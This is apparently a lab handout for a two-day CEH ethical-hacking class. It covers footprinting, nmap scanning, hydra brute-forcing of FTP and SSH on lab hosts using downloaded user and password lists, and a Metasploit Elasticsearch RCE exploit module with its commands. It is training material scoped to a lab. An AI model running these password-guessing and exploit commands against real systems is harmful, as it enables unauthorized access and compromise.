2 Day LABS

This is for the 2 Day CEH class

These are simple labs for online to give you questions for class: To be clear you only have permission to do these actions and no more. Do not do them against your own network or organization unless you have written permission. *

02 Footprinting

• Passive: Site Report against expsec.us https://sitereport.netcraft.com/?url=https%3A%2F%2Fexpsec.us
• Domain Name System: find the email server related to expsec.us
• https://mxtoolbox.com/SuperTool.aspx or https://www.ultratools.com/tools/dnsLookup
• Collect all data for expsec.us - without scanning AWS lab
• Documentation stored here (make a copy and share with instructor) https://docs.google.com/spreadsheets/d/1YprfmzROSUkqpAfGRdNfcSO8mM0FarOXRJ6gg8rVGdg/edit#gid=0
• Scope all users from expsec.us, all social media, all external sites, you may test up to 25 passwords on website but you may not brute force.
• Optional for Advanced students (no hints): footprint this site www.certifiedhacker.com & document in separate sheet.

03 Scanning

• ON AWS lab: victims 10.0.0.10 & 10.0.0.21
• Nmap
• need help? https://www.stationx.net/nmap-cheat-sheet/
• Document all

04 Enumeration

• Based upon services offered in AWS
• Go here https://nmap.org/nsedoc/scripts/
• You will get the index page listing all the nmap scripts
• Identify and document relevant scripts using browser search as a counting mechanism
• In class - post in mentimeter count # of scripts related to web services
• After class - run relevant nse scripts against victims
• helper nmap cheatsheet
• https://www.stationx.net/nmap-cheat-sheet/

05 Vulnerability Assessment

In class watch - After class - send email results

• Time pressure is a real part of penetration testing-
• Open all 5 of these links in separate tabs

1. CVE-2014-0160 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
2. CVE-2014-6271 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
3. CVE-2015-1538 https://en.wikipedia.org/wiki/Stagefright_(bug)
4. CVE-2014-3566 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566

ADV: https://sploitus.com/?query=POODLE#exploits

1. CVE-2015-3456 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3456

ADV: https://cxsecurity.com/issue/WLB-2006010010

• You are a defender making a risk assessment
• You have 5 minutes to review all 5 - make a determination:
• Which of these was or is the worst in your environment (your last job)

After class

• Attend 2 DAY CASP for real vulnerability analysis process

06 Hack

• Rerun nmap in metasploit

• Using Metasploit and Nmap together as a scanner

• IN KALI

• @ $

•   bash
  

• this is an insecure shortcut for production systems

•   sudo -i
  

• @ root

•   msfconsole
  

• @ msf6>

•   color true
  

•   db_nmap -sS -A 10.0.0.10-21
  

•   services
  

• Document

• IN Artifact repository Manually (google sheet/ YOUR copy and paste)

• Copy output to Vulnerabilities 1 tab (still unconfirmed)

• https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing

• Reformat

• IN KALI

• @ msf6>

•   exit
  

• !!!done!!!

Upload large password lists & expsec possible user list

• IN KALI
• @ root

•   apt -y install seclists
  

•   seclists -h
  

• Upload expsec possible user list & custom password list
• Shortcut: I put cleaned expsec (this takes planning & process)
• User list on AWS S3
• ` Using wget & moving into correct directory
• IN KALI
• @ root

•   wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
  

•   mv expsecusers.txt /usr/share/seclists/Usernames/
  

•   wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
  

•   mv expsec-passwords.txt /usr/share/seclists/Passwords/
  

• !!!done!!!

Password Guessing against 2 targets running FTP & SSH

• Using hydra
• From Scan: Port 21 & 22 are open on .10 & .21
• From seclist we have multiple list (one real short, one fake because the lab can't take 122 hrs)
• make 2 target lists by echoing data into a file
• IN KALI
• @ root

•   echo '10.0.0.10:21' >> targetsFTP.txt
  

•   echo '10.0.0.21:21' >> targetsFTP.txt
  

•   echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt	
  

• verify your file contents

•   cat targetsFTP.txt
  

•   cat targetsSSH.txt
  

• verify if you are in /usr/share/seclist (see 2 target files above)

•   ls
  

• Use 1 famous list of passwords & a custom list
• How long does first take?

•   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp
  

•   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp	
  

•   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh		
  

• Who do we get?
• Document
• IN Artifact repository Manually (google sheet/ your copy and paste)
• Copy output to Vulnerabilities 1 tab (still unconfirmed)
• Reformat
• !!!done!!!

Vulnerability search: for three found

• ProFTPD 1.3.5
• Oracle Glassfish Application Server
• wap-wsp / port 9200
• (for last one google: what is wap-wsp / port 9200)
• Research using:
• https://nvd.nist.gov/vuln/search or https://www.cvedetails.com/
• https://www.exploit-db.com/
• Document
• IN Artifact repository Manually (google sheet/ your copy and paste)
• !!!done!!!

Exploit

• We have SSH so we can do anything. But we are not.
• Start a SSH instance and escalate priv.
• IN KALI
• @ root

•   ssh 10.0.0.21 -l boba_fett
  

• Supply password from your Artifact's sheet

•   CTRL Z
  

• You now have a remote shell on the windows victim ( it will NOT act like your Kali terminal)
• What you can do depends on microsoft administrator skills.
• Exploit port 9200
• IN KALI
• @ msf6>
• ? what services have we captured

•   services
  

• ? use exploit (CVE-2014-3120)
• I am not giving you the settings for set ( you must think and apply what you have learned)

•   use exploit/multi/elasticsearch/script_mvel_rce
  

•   set RHOST
  

•   set LHOST
  

•   set RPORT
  

•   set LPORT 4444
  

• normally we set PAYLOAD but we are trying to verify exploit only

•   run
  

• returned message: Exploit completed, but no session was created.
• !!!done!!!

07 Malware

• Only discussion

08 Sniffing

• Install wireshark https://www.wireshark.org/download.html
• https://github.com/deanbushmiller/CEH-bootcamp/tree/master/4Day/LAB-Capture-pcapng/Day1-08
• Think Stimulus / Response / Listen + Filter

Really great hacking lab on log4j

• you can use Kali and a standard UBUN20 victim
• https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/

Extra labs or learning / links from 2 day presentation

• Footprinting Maltego- learning https://courses.maltego.com/courses/maltego-essentials-v1
• Scanning Metasploit https://vimeo.com/505905232 Nmap Scanning https://vimeo.com/506615034
• Vulnerability Assessment OpenVAS https://vimeo.com/506310903
• System Hacking Metasploit https://vimeo.com/505905232
• Sniffing Snort IDS https://vimeo.com/506867367
• More lab recordings: https://github.com/deanbushmiller/CEH-bootcamp/wiki/LABS#lab-recordings--details-necessary-for-exam-below-
• All of Metasploit : https://www.offensive-security.com/metasploit-unleashed/
• Dean's Quizzer signup https://docs.google.com/forms/d/1xIraJSqu9hrzmi30gfnEvFcFWzmWkt0YJI_poTNYZ6Q